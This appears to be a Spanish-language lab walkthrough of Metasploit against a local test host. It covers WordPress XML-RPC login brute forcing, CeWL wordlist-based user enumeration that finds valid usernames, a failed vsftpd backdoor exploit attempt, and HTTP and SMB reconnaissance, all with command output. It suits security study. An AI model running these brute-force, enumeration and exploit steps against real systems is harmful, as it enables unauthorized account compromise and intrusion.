use auxiliary/scanner/http/wordpress_content_injection  use auxiliary/scanner/http/wordpress_multicall_creds
use auxiliary/scanner/http/wordpress_cp_calendar_sqli   use auxiliary/scanner/http/wordpress_pingback_access
use auxiliary/scanner/http/wordpress_ghost_scanner      use auxiliary/scanner/http/wordpress_scanner
use auxiliary/scanner/http/wordpress_login_enum         use auxiliary/scanner/http/wordpress_xmlrpc_login

Tecleo: `use auxiliary/scanner/http/wordpress_xmlrpc_login` Para cargar un plugin en concreto.

msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >

Tecleo `sh <tab> act <tab>` para conseguir el comando `show actions`

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show actions 

Auxiliary actions:
   Name  Description

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >

Tecleo `info` para obtener la informacion del plugin

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > info

       Name: Wordpress XML-RPC Username/Password Login Scanner
     Module: auxiliary/scanner/http/wordpress_xmlrpc_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Cenk Kalpakoglu <cenk.kalpakoglu@gmail.com>

Description:
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  USER_FILE, PASS_FILE, and USERPASS_FILE options.

References:
  https://wordpress.org/
  http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/
  https://cvedetails.com/cve/CVE-1999-0502/

Tecleo `show options` para ver las opciones del plugin.

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options
Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
   Name              Current Setting  Required  Description
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   TARGETURI         /                yes       The base path to the wordpress application
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

Configuro el plugin

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set targeturi /
targeturi => /
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set rhosts 192.168.56.103
rhosts => 192.168.56.103
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run

[*] 192.168.56.103:80    :/xmlrpc.php - Sending Hello...
[+] 192.168.56.103:80 - XMLRPC enabled, Hello message received!
[*] Starting XML-RPC login sweep...
[*] Error: 192.168.56.103: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::WordpressRPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Parece que por fin consigo algo.

Crear un diccionario con los datos de una web

root@kali:~# cewl http://192.168.56.103 > wp.txt 
root@kali:~# head wp.txt 
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
WordPress
que
Everybody
want
chef
para
gazpacho
pan
entry

Pruebas plugins Metasploit Framework console.

1) defino la variable `rhosts a 192.168.56.103` como global. Asi no tengo que ponerla cada vez.

setg rhosts 192.168.56.103

msf5 > set -g rhosts 192.168.56.103
rhosts => 192.168.56.103
msf5 >

msf5 > use auxiliary/scanner/http/wordpress_login_enum 
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.56.103
msf5 auxiliary(scanner/http/wordpress_login_enum) > set user_file wp.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set verbose false
msf5 auxiliary(scanner/http/wordpress_login_enum) > run

[*] / - WordPress Version 4.6.6 detected
[*] / - WordPress User-Validation - Checking Username:'CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)'
[*] / - WordPress User-Validation - Checking Username:'WordPress'
[*] / - WordPress User-Validation - Checking Username:'que'
[*] / - WordPress User-Validation - Checking Username:'Everybody'
[*] / - WordPress User-Validation - Checking Username:'want'
[*] / - WordPress User-Validation - Checking Username:'chef'
[*] / - WordPress User-Validation - Checking Username:'para'
[*] / - WordPress User-Validation - Checking Username:'gazpacho'
...
...
...
[*] / - WordPress User-Validation - Checking Username:'Sean'
[+] / - WordPress User-Validation - Username: 'Sean' - is VALID
[*] / - WordPress User-Validation - Checking Username:'sean'
[+] / - WordPress User-Validation - Username: 'sean' - is VALID
[*] / - WordPress User-Validation - Checking Username:'mezcla'
[*] / - WordPress User-Validation - Checking Username:'cocinitas'
[+] / - WordPress User-Validation - Username: 'cocinitas' - is VALID
[*] / - WordPress User-Validation - Checking Username:'cocinitas'
[+] / - WordPress User-Validation - Username: 'cocinitas' - is VALID
[*] / - WordPress User-Validation - Checking Username:'with'
...
...
...
[+] / - WordPress User-Validation - Found 3 valid users
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

vsftpd_234_backdoor

msf5 > use  exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.56.103:21 - Banner: 220 (vsFTPd 2.3.5)
[*] 192.168.56.103:21 - USER: 530 This FTP server is anonymous only.
[-] 192.168.56.103:21 - This server is configured for anonymous only and the backdoor code cannot be reached
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > info

       Name: VSFTPD v2.3.4 Backdoor Command Execution

http_version

msf5 > use auxiliary/scanner/http/http_version 
msf5 auxiliary(scanner/http/http_version) > run

[+] 192.168.56.103:80 Apache/2.2.22 (Ubuntu) ( Powered by PHP/5.3.10-1ubuntu3.26 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nota:Se puede averiguar mas rapido con curl -vs 192.168.56.103 | grep server

http/dir_scanner

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.103
[+] Found http://192.168.56.103:80/cgi-bin/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/doc/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/icons/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/wp-includes/ 200 (192.168.56.103)
[+] Found http://192.168.56.103:80/wp-login/ 200 (192.168.56.103)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

http/brute_dirs

msf5 > use auxiliary/scanner/http/brute_dirs 
msf5 auxiliary(scanner/http/brute_dirs) > show options 

Module options (auxiliary/scanner/http/brute_dirs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FORMAT   a,aa,aaa         yes       The expected directory format (a alpha, d digit, A upperalpha)
   PATH     /                yes       The path to identify directories
   RHOSTS   192.168.56.103   yes       The target address range or CIDR identifier

msf5 auxiliary(scanner/http/brute_dirs) > run

[*] Using code '404' as not found.
[+] Found http://192.168.56.103:80/doc/ 403
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

smb_version

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.56.103:445    - Host could not be identified: Unix (Samba 3.6.3)
[*] 192.168.56.103:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) >

smb_enumusers

msf5 > use auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.103:139    - ILLIDAN [ nobody, sean ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.103:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >